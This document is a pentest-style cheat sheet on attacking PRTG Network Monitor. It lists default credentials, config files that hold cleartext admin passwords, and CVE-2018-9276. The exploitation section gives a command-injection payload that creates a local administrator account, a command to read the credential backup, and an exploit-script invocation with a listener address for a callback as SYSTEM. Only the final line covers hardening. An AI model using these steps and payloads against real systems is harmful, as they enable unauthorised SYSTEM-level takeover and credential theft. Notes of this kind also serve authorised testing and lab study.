PRTG Network Monitor

Ports

Port	Proto	Notes
`80`	tcp	PRTG web UI
`443`	tcp	PRTG web UI (TLS)

Fingerprint

PRTG login page; version shown in the page source / footer
Server header references PRTG

Key files

Path	Holds	Sensitive
`C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.old`	old config with cleartext admin credentials	sensitive
`PRTG Configuration.dat`	live config (credentials, sensors)	sensitive

Default / weak creds

prtgadmin / prtgadmin (default)

Service users

SYSTEM (PRTG service runs as SYSTEM)

Known CVEs

CVE	Impact
CVE-2018-9276	Authenticated OS command injection via notification parameters, executes as SYSTEM

Exploitation primitives

Default prtgadmin/prtgadmin, or recover the password from the .old config backup
CVE-2018-9276: create a notification with a demo EXE/param that injects a command (add a local admin, reverse shell) as SYSTEM

Overview

PRTG runs as SYSTEM on Windows, so command execution through it is an instant SYSTEM. Even before the CVE, a leftover PRTG Configuration.old often hands over the admin password.

Recover the admin password

The leftover config backup holds cleartext creds — often reachable over an anonymous share/FTP or once you have any read:

type "C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.old.bak"

Then log in with prtgadmin + the recovered password (or try the default prtgadmin:prtgadmin).

CVE-2018-9276 (authenticated → SYSTEM)

In the UI: Setup → Notifications → add → Execute Program, set a parameter that injects a command:

test.txt;net user pwn Pwn123! /add;net localgroup administrators pwn /add

Save, then Test the notification to run it as SYSTEM. The exploit can also be driven over the API:

python3 prtg-exploit.py -i http://<TARGET> -u prtgadmin -p '<PASS>' --lhost <YOUR_IP>

Hardening

Change default creds, patch past 18.2.39, and protect config backups.